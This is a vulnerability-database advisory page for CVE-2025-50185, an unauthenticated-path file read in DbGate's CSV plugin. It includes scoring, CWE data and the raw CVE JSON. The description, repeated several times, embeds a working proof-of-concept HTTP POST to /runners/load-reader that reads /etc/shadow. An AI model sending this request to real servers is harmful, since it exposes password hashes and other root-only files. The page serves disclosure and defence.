CVE-2025-50185 (GCVE-0-2025-50185)

Vulnerability from cvelistv5 – Published: 2025-07-26 03:34 – Updated: 2025-07-28 18:55
VLAI
Title
DbGate allows Unauthorized File Access via CSV Plugin
Summary
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue. ``` POST /runners/load-reader HTTP/1.1 Host: <REPLACE ME> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: <REPLACE ME> Content-Type: application/json Authorization: Bearer <REPLACE ME> Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: <REPLACE ME> Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)
Severity
7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P
CWE
  • CWE-29 - Path Traversal: '..filename'
Assigner
References
Impacted products
Vendor Product Version
dbgate dbgate Affected: <= 6.6.0
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-50185",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-28T15:27:58.994623Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-28T18:55:40.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dbgate",
          "vendor": "dbgate",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 6.6.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\n\n\nLines of the file being returned:\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)"
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-29",
              "description": "CWE-29: Path Traversal: \u0027..filename\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-26T03:34:43.481Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
        },
        {
          "name": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"
        }
      ],
      "source": {
        "advisory": "GHSA-7x75-fmx7-q6h9",
        "discovery": "UNKNOWN"
      },
      "title": "DbGate allows Unauthorized File Access via CSV Plugin"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-50185",
    "datePublished": "2025-07-26T03:34:43.481Z",
    "dateReserved": "2025-06-13T19:17:51.726Z",
    "dateUpdated": "2025-07-28T18:55:40.184Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2025-50185",
      "date": "2026-05-28",
      "epss": "0.00509",
      "percentile": "0.66623"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-50185\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-26T04:16:04.207\",\"lastModified\":\"2025-07-29T14:14:55.157\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\\n\\n\\n\\n\\n\\n\\n```\\nPOST /runners/load-reader HTTP/1.1\\nHost: \u003cREPLACE ME\u003e\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\\nAccept: */*\\nAccept-Language: en-US,en;q=0.5\\nAccept-Encoding: gzip, deflate, br\\nReferer: \u003cREPLACE ME\u003e\\nContent-Type: application/json\\nAuthorization: Bearer \u003cREPLACE ME\u003e\\nContent-Length: 127\\nOrigin: http://192.168.124.119:3000\\nConnection: keep-alive\\nCookie: \u003cREPLACE ME\u003e\\nPriority: u=0\\nCache-Control: max-age=0\\n\\n{\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}}\\n\\n```\\n\\n\\n\\nThe request payload:\\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\\n\\n\\nLines of the file being returned:\\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"},{\"lang\":\"es\",\"value\":\"DbGate es un gestor de bases de datos multiplataforma. En las versiones 6.6.0 y anteriores, DbGate permite el acceso no autorizado a archivos debido a una validaci\u00f3n insuficiente de las rutas y los tipos de archivo. Un usuario con acceso a nivel de aplicaci\u00f3n puede recuperar datos de archivos arbitrarios en el sistema, independientemente de su ubicaci\u00f3n o tipo de archivo. El complemento no realiza las comprobaciones adecuadas del tipo de contenido y la extensi\u00f3n del archivo antes de leerlo. Como resultado, incluso archivos confidenciales accesibles solo para el usuario root pueden leerse a trav\u00e9s de la interfaz de la aplicaci\u00f3n. Actualmente no hay soluci\u00f3n para este problema.``` POST /runners/load-reader HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer:  Content-Type: application/json Authorization: Bearer  Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie:  Priority: u=0 Cache-Control: max-age=0 {\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.0,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-29\"}]}],\"references\":[{\"url\":\"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-50185\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-28T15:27:58.994623Z\"}}}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-28T15:28:00.673Z\"}}], \"cna\": {\"title\": \"DbGate allows Unauthorized File Access via CSV Plugin\", \"source\": {\"advisory\": \"GHSA-7x75-fmx7-q6h9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"dbgate\", \"product\": \"dbgate\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 6.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"name\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"name\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\\n\\n\\n\\n\\n\\n\\n```\\nPOST /runners/load-reader HTTP/1.1\\nHost: \u003cREPLACE ME\u003e\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\\nAccept: */*\\nAccept-Language: en-US,en;q=0.5\\nAccept-Encoding: gzip, deflate, br\\nReferer: \u003cREPLACE ME\u003e\\nContent-Type: application/json\\nAuthorization: Bearer \u003cREPLACE ME\u003e\\nContent-Length: 127\\nOrigin: http://192.168.124.119:3000\\nConnection: keep-alive\\nCookie: \u003cREPLACE ME\u003e\\nPriority: u=0\\nCache-Control: max-age=0\\n\\n{\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}}\\n\\n```\\n\\n\\n\\nThe request payload:\\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\\n\\n\\nLines of the file being returned:\\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-29\", \"description\": \"CWE-29: Path Traversal: \u0027..filename\u0027\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-26T03:34:43.481Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-50185\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-28T18:55:40.184Z\", \"dateReserved\": \"2025-06-13T19:17:51.726Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-26T03:34:43.481Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.